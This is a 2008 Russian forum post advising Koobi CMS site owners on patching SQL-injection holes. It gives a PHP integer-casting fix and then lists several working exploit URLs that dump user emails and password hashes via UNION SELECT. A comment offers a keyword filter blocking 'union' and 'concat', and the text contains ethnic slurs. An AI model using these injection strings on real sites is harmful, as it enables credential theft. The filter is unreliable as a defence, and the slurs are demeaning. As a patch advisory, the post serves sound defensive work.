Overdoze.Ru
Запомнить авторизацию  [?] | Забыли пароль? | Регистрация
Сегодня: 25 апреля 2018 г., 13:34:32  
Актуальные версии AVE CMS:   AVE CMS 3.0RC | AVE.CMS 2.09RC2 svn | AVE CMS 2.08 original

раскрутка сайтов

Категории:
Общие - Скрипты - Дизайн - Статьи - Партнеры - Объявления

Внимание владельцам Koobi!



Взлом Koobi CMS турецкими спермахлебами уже реально достал - эти идиоты думают, тут кто-то понимает турецкий язык и пугается стрррашным угрозам вернуть турецкую империю на нем! Особенно отличается молодой хакер-имбецил  arsen lüper - у него есть даже курточка с капюшоном. Что же делать? Читать далее...

Старый Овер борозды не портит.

Внимание админам сайта! Лечение этого взлома!
Уважаемые друзья!
Прочитал я этот пост сегодня и приуныл. Сам юзаю 2 сайта на куби 6.
Пожаловался своему другу программеру, дал адресок своего сайта и через 2 минуты получил своё админское мыло дветочие мд5 хеш моего пароля. вот так то!

Лечится очень просто.
И так....

ВОТ ЭТОТ КОД:

if(isset($_GET['galid'])) $_GET['galid']=(int)$_GET['galid'];
if(isset($_REQUEST['galid'])) $_REQUEST['galid']=(int)$_REQUEST['galid'];

if(isset($_GET['amp;galid'])) $_GET['amp;galid']=(int)$_GET['amp;galid'];
if(isset($_REQUEST['amp;galid'])) $_REQUEST['amp;galid']=(int)$_REQUEST['amp;galid'];

if(isset($_GET['img_id'])) $_GET['img_id']=(int)$_GET['img_id'];
if(isset($_REQUEST['img_id'])) $_REQUEST['img_id']=(int)$_REQUEST['img_id'];

if(isset($_REQUEST['ascdesc'])) { if($_REQUEST['ascdesc']!='asc' AND $_REQUEST['ascdesc']!='desc') $_REQUEST['ascdesc']='desc';}

НАДО вставить в:

/system/gallery.php и /system/gallerypic.php
после строки " if(!defined("BASEDIR")) exit; "


Зачем это. Пояснения.

Этот код принудительно приводит все значения переменных galid и pic_id к целочисленному виду, исключая SQL инъекции в запросах вида

Query("SELECT * FROM ".PREFIX."_gallery_items WHERE gal_id=$_REQUEST[galid] order by id $_REQUEST[ascdesc] ";

Query("SELECT uid FROM ".PREFIX."_gallery WHERE uid='".UID."' AND id='".$_GET['galid']."' ";

таким образом, хакерские запросы вида
[URL]http://site.com/index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+%200,concat[/URL][/URL](email,0x3a,pass),2,2,2,2+from+kubi_user
- не пройдут.

Внимание. Вставлять ЭТО в Index.php НЕ имеет смысла.
Так как это 50 на 50, ну может при включенных, или отключенных, глобальных переменных это и в индексе сразботает конечно.


Спасибо shepherd2

Подробности:

Koobi 4.4/5.4
Koobi Pro 6.25

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «img_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2, concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
index.php?p=gallerypic&img_id=-1+union+select+0,1,2, concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «galid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?area=1&p=gallery&action=showimages&galid=-1+union+ select+0,concat(email,0x3a,pass),2+from+kpro_user

3) Уязвимость существует из-за недостаточной обработки входных данных в параметре «galid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+ 0,concat(email,0x3a,pass),2+from+kpro_user

4) Уязвимость существует из-за недостаточной обработки входных данных в параметре «categ» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+ union+select+0,concat(email,0x3a,pass),2+from+kpro_user

5) Уязвимость существует из-за недостаточной обработки входных данных в параметре «categ» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?showlink=S@BUN&fid=S@BUN8&p=links&area=1&categ=-1+ union+select+0,concat(email,0x3a,pass),2+from+kpro_user admin login=admin/login.php




17.06.2008, 12:31 | Site Root (scripts)

Комментарии



Последний комментарий

От Anton BITMAP в 17.06.2008, 14:10
Да, люди перешивайте все на Ангину
От censored censored в 17.06.2008, 14:16
Про это еще год назад сообщалось.
Нашел один из мемберов Античата =)
» Ответ: От Site Root в 17.06.2008, 16:50  
Ну, видишь, Сензор, далеко не все поправили - набери в гугле arsen lüper, увидишь )))
От Bin Laden в 19.06.2008, 19:54
у чурков есть порталы, аналогичные оверу, там кубик развивают как и вы раньше, я там иногда аддоны и фиксы беру от них и дремового суппорта. Кидаю свои сайты в подпись, смотрю по логам заходы из турции (я вроде один в литве на кубике варганю). А малолетки там как санитары сети немецким и русским тормозам напоминают что надо латать прошлогодние дырки.

П.С. учитесь извлекать пользу, они бесплатные бетатестеры для меня, а не проблема ;)
От Bin Laden в 19.06.2008, 20:19
кстати кому интересно один из центров османской империи тут www.kuaza.org
От Николай Иванов в 10.08.2008, 00:49
Чтобы исключить подобные инъекции в начале файла index.php вставляете вот такой код :

---------------
$querystr =$_SERVER['QUERY_STRING'];
if (strstr($querystr,"concat_ws") || strstr($querystr,"concat") || strstr($querystr,"union"))
{ header( "Location: index.php" ); }

-----------------
и все...

Конечно, с помощью регулярных выражений смотрелось бы элегантней, но этот код работает быстрее.
Проверено лично.
Инъекция производится подменой SQL запроса, т.е. без union не обойтись, а тут,как только в строке есть union (т.е. замена запроса) , concat_ws или concat (объединение строк, хотя можно и без него обойтись) - тут же приключается редирект со сбросом параметров.
Кстати, если это прописать в .htaccess - будет еще лучше.
» Ответ: От Site Root в 19.08.2008, 18:08  
А грузины тем не менее продолжают ломать наши кубики этой фигней )))

Новые комментарии



Ответил: Macho Dark
"...Перпезалейте, пожалуйста!"

18-04-2012 г. 19:04  |  Читать все...


Ответил: Alex Samarskiy
"...Добрый день, Присоединяюсь к вопросу о ЧПУ для данной сборки. Присутствует или нет? Спасибо"

20-10-2011 г. 13:01  |  Читать все...


Ответил: АЛЕКСАНДР КОРОВИН
"...Я В ЭТОМ ДЕЛЕ НОВИЧОК,,,НО КАЖЕТСЯ ПОПАЛ,КУДА НАДО,ХОТЕЛОСЬ БЫ ПОПРОБОВАТЬ СЕРТИФИЦИРОВАННОЕ ДЕТИЩЕ,ХОТЯ И 14 АНГИНУ СКАЧАТЬ НЕ УДАЛОСЬ,А УЧИТЬСЯ..."

18-02-2011 г. 07:00  |  Читать все...


Ответил: Игорь Ямпольский
"...А в ответ тишина ;) хоть бы написал как вышел на такое кол-во запросов - просветил бы. Выражаю благодарность разработчикам за отставание от..."

28-01-2011 г. 09:24  |  Читать все...


Ответил: Yes vik
"...Ты где столько запросов нашел? "

21-01-2011 г. 20:57  |  Читать все...


Ответил: stanlee xz
"...Это фуфло полное а не цмс Вы ребята похоже совсем от жизни отстали. а это ваще убило Количство запросов к БД: 289шт. Автор ты с головой..."

11-01-2011 г. 15:10  |  Читать все...



 

Печать страницы | Рекомендовать Сайт


рублей Яндекс.Деньгами
на счёт 41001130616963 (Разработки Overdoze.Ru)

Сибавтомастер: техобслуживание и ремонт японских автомобилей
Количство запросов к БД: 123шт. | Время генерации страницы: 0,0706